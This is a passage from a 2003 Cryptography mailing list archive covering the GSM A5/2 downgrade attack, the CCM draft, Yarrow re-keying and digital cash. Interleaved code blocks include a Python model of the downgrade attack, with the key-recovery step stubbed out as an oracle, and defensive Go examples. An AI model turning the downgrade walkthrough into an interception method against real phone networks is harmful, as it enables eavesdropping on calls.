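        c1, c2, c3 = bool(self.r1 & R1MID), bool(self.r2 & R2MID), bool(self.r3 & R3MID)
        maj = (c1 + c2 + c3) >= 2
        if c1 == maj:
            self.r1 = _step(self.r1, R1MASK, R1TAPS)
        if c2 == maj:
            self.r2 = _step(self.r2, R2MASK, R2TAPS)
        if c3 == maj:
            self.r3 = _step(self.r3, R3MASK, R3TAPS)

    def keystream(self, nbits=114):
        """Return nbits of keystream, packed MSB first (114 = one burst direction)."""
        out = bytearray((nbits + 7) // 8)
        for i in range(nbits):
            self._clock()
            b = _parity(self.r1 & R1OUT) ^ _parity(self.r2 & R2OUT) ^ _parity(self.r3 & R3OUT)
            out[i >> 3] |= b << (7 - (i & 7))
        return bytes(out)


def a8_stand_in(ki, rand, alg, bind_alg):
    """Stand-in for A8 (assumption; the real A8 is operator-specific, e.g. COMP128).

    Deployed GSM: Kc = f(Ki, RAND) only, so the same Kc serves whichever cipher
    the network later selects. With bind_alg=True the algorithm identifier is
    mixed in (illustrative hardening, not GSM's actual remedy).
    """
    msg = rand + (alg.encode() if bind_alg else b"")
    return hmac.new(ki, msg, hashlib.sha256).digest()[:8]


def xor_burst(kc, frame, data):
    """Encrypt or decrypt one burst under A5/1 (stream cipher: same operation)."""
    ks = A51(kc, frame).keystream(len(data) * 8)
    return bytes(d ^ k for d, k in zip(data, ks))


def downgrade_attack(ki, rand, bind_alg=False):
    """True if an attacker who can break A5/2 thereby decrypts a recorded A5/1 burst."""
    # 1. Real network authenticates the phone: RAND crosses the air in clear, the
    #    phone computes Kc, the network commands A5/1. The attacker records both.
    kc_a51 = a8_stand_in(ki, rand, "A5/1", bind_alg)
    frame, plaintext = 0x134, b"constructed burst"          # constructed sample
    recorded = xor_burst(kc_a51, frame, plaintext)
    # 2. Later the attacker's fake base station replays the very same RAND and
    #    commands A5/2; the phone derives its key exactly as before.
    kc_a52 = a8_stand_in(ki, rand, "A5/2", bind_alg)
    # 3. Barkan-Biham-Keller recover the A5/2 key from ciphertext in real time.
    #    That cryptanalysis is not reproduced here; it is modelled as an oracle.
    kc_recovered = kc_a52
    # 4. The recovered key is tried against the recorded A5/1 traffic.
    return xor_burst(kc_recovered, frame, recorded) == plaintext
```

With the deployed derivation the recorded A5/1 burst decrypts under the key
learned from the forced A5/2 session, because a replayed RAND makes the phone
recompute the identical Kc; binding the algorithm into the key makes the two
sessions' keys unrelated and the replay worthless. The A5/1 routine can be
checked against the test vector that ships with the reference implementation.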




Re: Digital cash and campaign finance reform

2003-09-08 Thread Michael Froomkin - U.Miami School of Law

http://papers.ssrn.com/sol3/papers.cfm?abstract_id=60331

http://papers.ssrn.com/sol3/papers.cfm?abstract_id=272787

http://www.cfp2000.org/papers/franklin.pdf

http://www.yale.edu/yup/books/092628.htm




On Mon, 8 Sep 2003, Steve Schear wrote:

> Everyone knows that money is the life blood of politics.  The topic of 
> campaign finance reform in the U.S. has been on and off the front burner of 
> the major media, for decades.  Although the ability of citizens and 
> corporations to support the candidates and parties of their choice can be a 
> positive political force, the ability of political contributors to buy 
> access and influence legislation is probably the major source of 
> governmental corruption.  Despite some, apparently, honest efforts at 
> limiting these legal payoffs there has been little real progress.  The 
> challenge is to encourage "neutral" campaign contributions.  Perhaps 
> technology could lend a hand.
> 
> One of the features of Chaumian digital cash is unlinkability.  Normally, 
> this has been viewed from the perspective of the payer and payee not 
> wishing to be linked to a transaction.  But it also follows that the 
> payee can be prevented from learning the identity of the payer even if they 
> wished.  Since the final payee in politics is either the candidate or the 
> party, this lack of knowledge could make it much more difficult for the 
> money to be involved in influence peddling and quid pro quo back room deals.
> 
> By combining a mandated digital cash system for contributions, a cap on the 
> size of each individual contribution (perhaps as small as $100), and randomized 
> delays (perhaps up to a few weeks) in the "posting" of each transaction to 
> the account of the counterparty, it could create mix conditions which 
> would thwart the ability of contributors to easily convince candidates and 
> parties that they were the source of particular funds and therefore 
> entitled to special treatment.
> 
> Comments?
> 
> steve
> 
> 
> A foolish Constitutional inconsistency is the hobgoblin of freedom, adored 
> by judges and demagogue statesmen.
> - Steve Schear 
> 
> 
> -
> The Cryptography Mailing List
> Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]
> 

-- 
Please visit http://www.icannwatch.org
A. Michael Froomkin   |Professor of Law|   [EMAIL PROTECTED]
U. Miami School of Law, P.O. Box 248087, Coral Gables, FL 33124 USA
+1 (305) 284-4285  |  +1 (305) 284-6506 (fax)  |  http://www.law.tm
  -->It's very hot here.<--


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


The Pure Crypto Project is released into the public domain

2003-09-08 Thread Ralf Senderek
-BEGIN PURE-CRYPTO SIGNED MESSAGE-
The development of the Pure Crypto Project has now finished
and the source code is finally released into the public domain.

 http://senderek.de/pcp/release

There is a detailed explanation of the security mechanisms and
the background of PCP in

http://senderek.de/security/pcp-protection.html

I'd like to thank everyone who had supported the development
with constructive criticism and helpful hints.

Ralf Senderek



-BEGIN PURE-CRYPTO SIGNATURE-
Hash: SDLH  *** based on modular exponentiation and RSA alone ***

Ralf Senderek, Wassenberg PCP signingkey 2003 <[EMAIL PROTECTED]>
25958032129854687932657359023881789067615223206769084549252083817701673635916478066451442739272409695432768892327091119955449106519210830940788017364200647426776939035963437924650466140653374164639095531127457251096969368134246401229854317278214790952108232304719334951046143931853036507848781896094422733831171511446825977175759419953334942627329020239718812579256503089309028102255938929278430717387498628586439358045328606841270655376672619190792218866509905138949190124291282590808234947292681044889977767097191953045774717004560559416349715717406817521786793391297428420236953949886297123601451
-END PURE-CRYPTO SIGNATURE-


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


ENC: Announcing release of DRAFT SP 800-38C - Recommendation for Block Cipher Modes of Operation the CCM Mode for Authentication and Confidentiality

2003-09-08 Thread Mads Rasmussen

In the draft Special Publication 800-38C, Recommendation for Block
Cipher Modes of Operation: the CCM Mode for Authentication and
Confidentiality, the CCM mode of the Advanced Encryption Standard (AES)
algorithm is specified for the protection of sensitive, unclassified
data. The CCM algorithm combines the counter (CTR) mode for
confidentiality with the cipher block chaining-message authentication
code (CBC-MAC) technique for authentication. Further information on the
development of block cipher modes of operation is available at the modes
home page http://nist.gov/modes/.

NIST welcomes public comments on the draft until October 20, 2003;
comments may be sent to [EMAIL PROTECTED]

Please go to the CSRC Draft publications page to view this document:
http://csrc.nist.gov/publications/drafts.html



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]
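
As an added illustration of the two halves the announcement describes (this is example code written for this archive, not NIST's reference code or a certified implementation), the following Go program assembles CCM from AES in CTR mode and CBC-MAC: the B0 block that binds the nonce, the message length and the tag length into the MAC; the two-octet length prefix on the associated data; the counter blocks A_i, whose S_0 masks the tag; and an Open that releases plaintext only after a constant-time tag check. It is restricted to a 13-byte nonce (L = 2) and short associated data, and checks itself against Packet Vector #1 of RFC 3610, the IETF specification of the same mode.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/subtle"
	"encoding/binary"
	"encoding/hex"
	"fmt"
)

// ccm is RFC 3610 / SP 800-38C CCM over AES with a 13-byte nonce, so L = 2,
// l(m) < 2^16 and l(a) < 2^16-2^8, and an even tag length M from 4 to 16.
type ccm struct {
	blk    cipher.Block
	tagLen int
}

// absorb runs CBC-MAC over data in 16-byte blocks, zero-padding the last one.
func (c *ccm) absorb(x *[16]byte, data []byte) {
	for i := 0; i < len(data); i += 16 {
		for j := 0; j < 16 && i+j < len(data); j++ {
			x[j] ^= data[i+j]
		}
		c.blk.Encrypt(x[:], x[:])
	}
}

// cbcMAC is the authentication half: CBC-MAC over B0 || encoded AAD || message,
// where B0 = flags || nonce || l(m) and flags = Adata | (M-2)/2 << 3 | (L-1).
func (c *ccm) cbcMAC(nonce, aad, msg []byte) []byte {
	x := [16]byte{byte((c.tagLen-2)/2)<<3 | 1}
	if len(aad) > 0 {
		x[0] |= 0x40
	}
	copy(x[1:], nonce)
	binary.BigEndian.PutUint16(x[14:], uint16(len(msg)))
	c.blk.Encrypt(x[:], x[:])
	if len(aad) > 0 { // l(a) goes in two octets in front of the AAD
		c.absorb(&x, append([]byte{byte(len(aad) >> 8), byte(len(aad))}, aad...))
	}
	c.absorb(&x, msg)
	return x[:c.tagLen]
}

// ctr is the confidentiality half: counter mode with A_i = (L-1) || nonce || i from
// i = start (0 yields S_0, which masks the tag; 1 encrypts the message). A_i never
// equals B0 because the flag octets differ, so MAC and keystream inputs are disjoint.
func (c *ccm) ctr(nonce, in []byte, start uint16) []byte {
	out, a, s := make([]byte, len(in)), [16]byte{1}, [16]byte{}
	copy(a[1:], nonce)
	for i := range in {
		if i%16 == 0 {
			binary.BigEndian.PutUint16(a[14:], start+uint16(i/16))
			c.blk.Encrypt(s[:], a[:])
		}
		out[i] = in[i] ^ s[i%16]
	}
	return out
}

// Seal returns ciphertext || (T xor S_0).
func (c *ccm) Seal(nonce, aad, pt []byte) ([]byte, error) {
	if len(nonce) != 13 || len(pt) > 0xffff || len(aad) >= 0xff00 {
		return nil, fmt.Errorf("ccm: bad nonce length or input too long for L=2")
	}
	return append(c.ctr(nonce, pt, 1), c.ctr(nonce, c.cbcMAC(nonce, aad, pt), 0)...), nil
}

// Open decrypts, recomputes the tag and compares it in constant time; on a
// mismatch no plaintext is returned, so a forgery never reaches the caller.
func (c *ccm) Open(nonce, aad, sealed []byte) ([]byte, error) {
	n := len(sealed) - c.tagLen
	if len(nonce) != 13 || n < 0 || n > 0xffff || len(aad) >= 0xff00 {
		return nil, fmt.Errorf("ccm: bad nonce length or message length")
	}
	pt := c.ctr(nonce, sealed[:n], 1)
	if subtle.ConstantTimeCompare(c.ctr(nonce, c.cbcMAC(nonce, aad, pt), 0), sealed[n:]) != 1 {
		return nil, fmt.Errorf("ccm: authentication failed")
	}
	return pt, nil
}

// rfc3610Vector1 runs RFC 3610 "Packet Vector #1" (AES-128, M = 8, 8-byte AAD,
// 23-byte message): sealed output and Open's result as hex, plus whether Open
// rejects the same packet with one ciphertext bit flipped.
func rfc3610Vector1() (sealedHex, openedHex string, tamperRejected bool) {
	h := func(s string) []byte { b, _ := hex.DecodeString(s); return b }
	blk, _ := aes.NewCipher(h("c0c1c2c3c4c5c6c7c8c9cacbcccdcecf"))
	c := &ccm{blk: blk, tagLen: 8}
	nonce, aad, pt := h("00000003020100a0a1a2a3a4a5"), h("0001020304050607"), h("08090a0b0c0d0e0f101112131415161718191a1b1c1d1e")
	sealed, _ := c.Seal(nonce, aad, pt)
	got, _ := c.Open(nonce, aad, sealed)
	// CTR alone would decrypt a flipped bit silently; the CBC-MAC makes Open refuse it.
	_, err := c.Open(nonce, aad, append([]byte{sealed[0] ^ 1}, sealed[1:]...))
	return hex.EncodeToString(sealed), hex.EncodeToString(got), err != nil
}

func main() {
	fmt.Println(rfc3610Vector1())
}
```

Run it with go run; it prints the sealed packet (which must match the RFC's "58 8C 97 9A ..." output for this vector), the recovered plaintext and true for the rejected forgery. The B0 flag octet for this vector is 0x59 = Adata | (8-2)/2 << 3 | (2-1). The practical caveat the draft also spells out: a nonce must never be reused under one key, since both the CTR keystream and the tag mask S_0 depend only on the key and the nonce.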


Re: Code breakers crack GSM cellphone encryption

2003-09-08 Thread Greg Rose
At 11:43 AM 9/8/2003 -0400, Anton Stiglic wrote:
>I think this is different however.  The recent attack focused on the A5/3
>encryption algorithm, while the work of Lucky, Briceno, Goldberg, Wagner,
>Biryukov, Shamir (and others?) was on A5/1 and A5/2 (and other crypto
>algorithms of GSM, such as COMP128, ...).
No, that's not right. The attack *avoids* A5/3, by making the terminal end 
of the call fall back to A5/2, solving for the key in real time, then 
continuing to use the same key with A5/3.

A5/3 (based on Kasumi, and essentially the same as the WCDMA algorithm 
UEA1) is not in any way compromised by this attack.

Greg.

Greg Rose                                    INTERNET: [EMAIL PROTECTED]
Qualcomm Australia          VOICE:  +61-2-9817 4188   FAX: +61-2-9817 5199
Level 3, 230 Victoria Road,                  http://people.qualcomm.com/ggr/
Gladesville NSW 2111    232B EC8F 44C6 C853 D68F  E107 E6BF CD2F 1081 A37C
-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Digital cash and campaign finance reform

2003-09-08 Thread Steve Schear
Everyone knows that money is the life blood of politics.  The topic of 
campaign finance reform in the U.S. has been on and off the front burner of 
the major media, for decades.  Although the ability of citizens and 
corporations to support the candidates and parties of their choice can be a 
positive political force, the ability of political contributors to buy 
access and influence legislation is probably the major source of 
governmental corruption.  Despite some, apparently, honest efforts at 
limiting these legal payoffs there has been little real progress.  The 
challenge is to encourage "neutral" campaign contributions.  Perhaps 
technology could lend a hand.

One of the features of Chaumian digital cash is unlinkability.  Normally, 
this has been viewed from the perspective of the payer and payee not 
wishing to be linked to a transaction.  But it also follows that the 
payee can be prevented from learning the identity of the payer even if they 
wished.  Since the final payee in politics is either the candidate or the 
party, this lack of knowledge could make it much more difficult for the 
money to be involved in influence peddling and quid pro quo back room deals.

By combining a mandated digital cash system for contributions, a cap on the 
size of each individual contribution (perhaps as small as $100), and randomized 
delays (perhaps up to a few weeks) in the "posting" of each transaction to 
the account of the counterparty, it could create mix conditions which 
would thwart the ability of contributors to easily convince candidates and 
parties that they were the source of particular funds and therefore 
entitled to special treatment.

Comments?

steve

A foolish Constitutional inconsistency is the hobgoblin of freedom, adored 
by judges and demagogue statesmen.
- Steve Schear 

-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: OpenSSL *source* to get FIPS 140-2 Level 1 certification

2003-09-08 Thread Tolga Acar
On second thought, given that there is no key management algorithm 
certified, how would one set up an SSL connection in FIPS mode?

It seems to me that it is not possible to have a FIPS 140 certified 
SSL/TLS session using OpenSSL's certification.

- Tolga

-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: Code breakers crack GSM cellphone encryption

2003-09-08 Thread Greg Rose
At 05:18 PM 9/7/2003 -0700, David Honig wrote:
> >A copy of the research was sent to GSM authorities in order to correct the
> >problem, and the method is being patented so that in future it can be used
> >by the law enforcement agencies.
>"Laughing my ass off."  Since when do governments care about patents?
>How would this help/harm them from exploiting it?   Not that
>high-end LEOs haven't already had this capacity ---Biham et al
>are only the first *open* researchers to reveal this.
Actually, patenting the method isn't nearly as silly as it sounds. Produced 
in quantity, a device to break GSM using this attack is not going to cost 
much more than a cellphone (without subsidies). Patenting the attack 
prevents the production of the "radio shack (tm) gsm scanner", so that it 
at least requires serious attackers, not idle retirees or jealous teenagers.

Greg.

Greg Rose                                    INTERNET: [EMAIL PROTECTED]
Qualcomm Australia          VOICE:  +61-2-9817 4188   FAX: +61-2-9817 5199
Level 3, 230 Victoria Road,                  http://people.qualcomm.com/ggr/
Gladesville NSW 2111    232B EC8F 44C6 C853 D68F  E107 E6BF CD2F 1081 A37C
-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: Code breakers crack GSM cellphone encryption

2003-09-08 Thread Anton Stiglic

>- Original Message - 
>From: "John Doe Number Two" <[EMAIL PROTECTED]>
>To: "R. A. Hettinga" <[EMAIL PROTECTED]>; "Clippable"
<[EMAIL PROTECTED]>
>Cc: <[EMAIL PROTECTED]>
>Sent: Sunday, September 07, 2003 6:45 PM
>Subject: Re: Code breakers crack GSM cellphone encryption
>

>It's nice to see someone 'discovering' what Lucky Green already figured-out
>years ago.  I wonder if they'll cut him a check.

I think this is different however.  The recent attack focused on the A5/3
encryption algorithm, while the work of Lucky, Briceno, Goldberg, Wagner,
Biryukov, Shamir (and others?) was on A5/1 and A5/2 (and other crypto
algorithms of GSM, such as COMP128, ...).

--Anton



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: cryptographic ergodic sequence generators?

2003-09-08 Thread Anton Stiglic
> [...]
> The Yarrow RNG uses counter-mode as a PRNG.  However in the paper they
> describe some effects you may want to avoid by re-keying depending on
> your application as the stream becomes distinguishable from random
> output.
>
> Adam

This is essentially because if your output sequence of n-bit blocks were
really random, you would expect to see a collision between two n-bit blocks
after seeing about 2^(n/2) block outputs (birthday paradox), but using a
block cipher with a counter gives you no collision before 2^n block outputs.
This is indeed why in the Yarrow design they suggest re-keying after 2^(n/3)
block outputs.

--Anton


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]
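
To make the collision argument above concrete, here is an added Go example (not code from the post, nor from Yarrow) that models a block cipher as a random permutation on n-bit blocks, which is how an ideal cipher looks to anyone without the key, and runs the birthday distinguisher on three streams: single-key counter mode, true random values, and counter mode re-keyed every 2^(n/3) blocks. With n = 16, 2^(n/2) = 256 and 2^(n/3) is about 40, so everything runs in a fraction of a second; the seed, block size and re-key interval are the example's own choices.

```go
package main

import (
	"fmt"
	"math/rand"
)

// idealCipher models an n-bit block cipher under one key as a random permutation
// of the 2^n block values. Keying it means drawing a fresh permutation.
type idealCipher struct {
	perm []uint32
}

func newIdealCipher(nbits int, rng *rand.Rand) *idealCipher {
	perm := make([]uint32, 1<<nbits)
	for i := range perm {
		perm[i] = uint32(i)
	}
	rng.Shuffle(len(perm), func(i, j int) { perm[i], perm[j] = perm[j], perm[i] })
	return &idealCipher{perm: perm}
}

// firstCollision returns the index of the first output that repeats an earlier
// one, or -1 if all outputs are distinct.
func firstCollision(seq []uint32) int {
	seen := make(map[uint32]struct{}, len(seq))
	for i, v := range seq {
		if _, dup := seen[v]; dup {
			return i
		}
		seen[v] = struct{}{}
	}
	return -1
}

// counterModeOutputs is E_K(0), E_K(1), ... under one key: a permutation applied
// to distinct inputs, so no two outputs can agree before the counter wraps at 2^n.
func counterModeOutputs(c *idealCipher, count int) []uint32 {
	out := make([]uint32, count)
	for i := range out {
		out[i] = c.perm[i%len(c.perm)]
	}
	return out
}

// rekeyedCounterOutputs draws a fresh key (permutation) and restarts the counter
// every rekeyEvery blocks, as Yarrow does after 2^(n/3) outputs.
func rekeyedCounterOutputs(nbits, count, rekeyEvery int, rng *rand.Rand) []uint32 {
	out := make([]uint32, 0, count)
	for len(out) < count {
		n := rekeyEvery
		if n > count-len(out) {
			n = count - len(out)
		}
		out = append(out, counterModeOutputs(newIdealCipher(nbits, rng), n)...)
	}
	return out
}

// randomOutputs draws count independent uniform n-bit values.
func randomOutputs(nbits, count int, rng *rand.Rand) []uint32 {
	out := make([]uint32, count)
	for i := range out {
		out[i] = uint32(rng.Intn(1 << nbits))
	}
	return out
}

// looksRandom is the birthday distinguisher: a random n-bit sequence repeats a
// value within a few multiples of 2^(n/2) outputs; single-key counter mode never does.
func looksRandom(seq []uint32, nbits int) bool {
	limit := 8 << (nbits / 2)
	if limit > len(seq) {
		limit = len(seq)
	}
	return firstCollision(seq[:limit]) != -1
}

// demoStreams builds the three sequences compared in main from one seed:
// n = 16, so 2^(n/2) = 256 and the re-key interval 40 is about 2^(n/3).
func demoStreams(seed int64) (ctr, rnd, rek []uint32) {
	const nbits = 16
	rng := rand.New(rand.NewSource(seed))
	ctr = counterModeOutputs(newIdealCipher(nbits, rng), 1<<nbits)
	rnd = randomOutputs(nbits, 1<<nbits, rng)
	rek = rekeyedCounterOutputs(nbits, 4096, 40, rng)
	return ctr, rnd, rek
}

func main() {
	ctr, rnd, rek := demoStreams(1)
	for _, s := range []struct {
		name string
		seq  []uint32
	}{{"single-key CTR", ctr}, {"true random", rnd}, {"CTR re-keyed every 40", rek}} {
		fmt.Printf("%-22s first collision at %6d, looks random: %v\n",
			s.name, firstCollision(s.seq), looksRandom(s.seq, 16))
	}
}
```

The single-key stream reports no collision at all in 2^16 outputs, the random stream collides after a few hundred, and the re-keyed stream collides like the random one. The cost of re-keying is the point of Adam's caveat: how often you can afford it is application-specific, and with a 128-bit block the distinguishing point sits at 2^64 blocks, so the question matters for small-block ciphers far more than for AES.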


Re: Is cryptography where security took the wrong branch?

2003-09-08 Thread Ben Laurie
Eric Rescorla wrote:

> Ben Laurie <[EMAIL PROTECTED]> writes:
> 
> 
>>Eric Rescorla wrote:
>>
>>>Incidentally, when designing SHTTP we envisioned that credit
>>>transactions would be done with signatures. I would say that
>>>the Netscape guys were right in believing that confidentiality
>>>for the CC number was good enough.
>>
>>I don't think so. One of the things I'm running into increasingly with
>>HTTPS is that you can't do an end-to-end check on a cert. That is, if I
>>have some guy logging into some site using a client cert, and that site
>>then makes a back-end connection to another site, there's no way it can
>>prove to the back-end site that it has the real guy online (without
>>playing nasty tricks with the guts of SSL, anyway), and there's
>>certainly no way to prove that some particular response came from him.
>>Signing stuff would deal with this trivially.
> 
> 
> Well, I'd certainly like to believe that this is true, since
> it would mean that Allan and I were right all along. :)

You _were_ right all along. At least about this :-)

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html   http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]
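
As an added example of the "signing stuff" Ben describes (illustrative Go written for this archive, not S-HTTP, Apache-SSL or anything from the thread, and it uses Ed25519, which did not exist in 2003), the following has the user's client sign each request and lets a back-end site that never saw the TLS session verify that the real user produced exactly that request. The front end only relays; it holds no key that would let it forge or alter. A signature alone is not enough, so the back end also checks the key against its own enrollment list, a timestamp window and a nonce cache to stop replay of a captured request. The user, paths and request bodies are made up for the demo.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
	"time"
)

// signedRequest is what the client sends through the front end to the back end.
// The front end can relay it but cannot mint one: the signature covers method,
// path, body, timestamp and nonce under the user's private key.
type signedRequest struct {
	Method, Path, Body, Nonce string
	Timestamp                 int64
	PubKey                    ed25519.PublicKey
	Sig                       []byte
}

// canonical is the byte string that gets signed. Each field is length-prefixed
// so moving bytes between fields (path into body, say) changes the string.
func canonical(r *signedRequest) []byte {
	var b strings.Builder
	for _, f := range []string{r.Method, r.Path, r.Body, fmt.Sprint(r.Timestamp), r.Nonce} {
		fmt.Fprintf(&b, "%d:%s;", len(f), f)
	}
	return []byte(b.String())
}

// sign runs on the user's client; only the client holds priv.
func sign(priv ed25519.PrivateKey, method, path, body string, now time.Time) (*signedRequest, error) {
	nonce := make([]byte, 16)
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	r := &signedRequest{Method: method, Path: path, Body: body, Nonce: hex.EncodeToString(nonce),
		Timestamp: now.Unix(), PubKey: priv.Public().(ed25519.PublicKey)}
	r.Sig = ed25519.Sign(priv, canonical(r))
	return r, nil
}

// backend is the second site. It never sees the user's TLS session; it trusts the
// request only because it verifies the signature against a key it enrolled itself.
type backend struct {
	users   map[string]string // hex public key -> user name, filled at enrollment
	seen    map[string]bool   // nonces already accepted, to refuse replays
	maxSkew time.Duration     // how old (or how far in the future) a request may be
}

func (be *backend) verify(r *signedRequest, now time.Time) (string, error) {
	user, ok := be.users[hex.EncodeToString(r.PubKey)]
	if !ok {
		return "", errors.New("signing key is not enrolled")
	}
	if !ed25519.Verify(r.PubKey, canonical(r), r.Sig) {
		return "", errors.New("signature does not cover this request")
	}
	if d := now.Sub(time.Unix(r.Timestamp, 0)); d > be.maxSkew || d < -be.maxSkew {
		return "", errors.New("request outside the freshness window")
	}
	if be.seen[r.Nonce] {
		return "", errors.New("nonce already used: replay")
	}
	be.seen[r.Nonce] = true
	return user, nil
}

// demo enrolls one user, relays a genuine request, then tries a front end that
// rewrites the body and a captured request replayed later. It returns who the
// back end accepted the first time and the errors for the two bad cases.
func demo() (accepted string, tamperErr, replayErr error) {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	be := &backend{users: map[string]string{hex.EncodeToString(pub): "alice"},
		seen: map[string]bool{}, maxSkew: 2 * time.Minute}
	now := time.Now()
	req, _ := sign(priv, "POST", "/transfer", `{"to":"bob","amount":10}`, now)
	accepted, _ = be.verify(req, now) // genuine request, relayed unchanged
	tampered := *req
	tampered.Body = `{"to":"mallory","amount":10000}` // front end rewrites the body
	_, tamperErr = be.verify(&tampered, now)
	_, replayErr = be.verify(req, now.Add(10*time.Second)) // same request again
	return accepted, tamperErr, replayErr
}

func main() {
	fmt.Println(demo())
}
```

The design choice worth noting is that the back end's trust rests on its own enrollment table, not on anything the front end asserts: TLS client authentication would have told only the front end who was connected, whereas the signature travels with the request to whoever needs to check it. The nonce cache is what a real deployment has to bound (by the freshness window) so that it does not grow without limit.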


GSM Association downplays mobile security concerns

2003-09-08 Thread R. A. Hettinga



GSM Association downplays mobile security concerns
By John Walko,  CommsDesign.com
Sep 3, 2003 (5:41 AM)
URL: http://www.commsdesign.com/story/OEG20030903S0013

LONDON - The GSM Association is playing down concerns raised by a team of
Israeli scientists about the security of GSM mobile calls.

The researchers, from the Technion Institute of Technology in Haifa,
revealed they had discovered a basic flaw in the encryption system of the
GSM (Global System for Mobile) specification, allowing them to crack its
encoding system.

The GSM Association, which represents vendors who sell the world's largest
mobile system, confirmed the security hole but said it would be expensive
and complicated to exploit.

Eli Biham, a professor at the Technion Institute, said he was shocked when
doctoral student Elad Barkan told him he had found a fundamental error in
the GSM code, according to a Reuters report on Wednesday (Sept. 3). The
results of the research were presented at a recent international conference
on cryptology.

"We can listen in to a call while it is still at the ringing stage, and
within a fraction of a second know everything about the user," Biham told
the news agency. "Then we can listen in to the call."

"Using a special device it's possible to steal calls and impersonate
callers in the middle of a call as it's happening," he added. GSM code
writers made a mistake in giving high priority to call quality, correcting
for noise and interference and only then encrypting, Biham said.

The GSM Association said the security holes in the GSM system can be traced
to its development in the late 1980s when computing power was still
limited. It said the particular gap could only be exploited with complex
and expensive technology and that it would take a long time to target
individual callers.

"This [technique] goes further than previous academic papers, [but] it is
nothing new or surprising to the GSM community. The GSM Association
believes that the practical implications of the paper are limited," the
group said in a statement.

The association said an upgrade had been made available in July 2002 to
patch the vulnerability in the A5/2 encryption algorithm.

It said any attack would require the attacker to transmit distinctive data
over the air to masquerade as a GSM base station. An attacker would also
have to physically stand between the caller and the base station to
intercept the call.

The researchers claimed they also managed to overcome the new encryption
system put in place as a response to previous attacks.

Copyright 2003 CMP Media, LLC
-- 
-
R. A. Hettinga 
The Internet Bearer Underwriting Corporation 
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'

-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


RE: Code breakers crack GSM cellphone encryption

2003-09-08 Thread Olle Mulmo

DMCA comes to mind: it could potentially make it a little harder to get
your hands on any mass market eavesdropping tool.

If you are terribly concerned about this, there are end-to-end encryption
phones on the market that are used by military and others already today.
Such systems come with a price tag though. As for me, the ordinary end
user, I just have to be as careful with what I say or trust when communicating
over the phone as when I'm using email.

But that should have already been the case, had I thought things through,
and shouldn't come as a shock.

/Olle

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of David Honig
Sent: den 8 september 2003 02:18
To: R. A. Hettinga; Clippable
Cc: [EMAIL PROTECTED]
Subject: Re: Code breakers crack GSM cellphone encryption

>A copy of the research was sent to GSM authorities in order to correct the
>problem, and the method is being patented so that in future it can be used
>by the law enforcement agencies.

"Laughing my ass off."  Since when do governments care about patents? 
How would this help/harm them from exploiting it?   Not that
high-end LEOs haven't already had this capacity ---Biham et al
are only the first *open* researchers to reveal this.



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]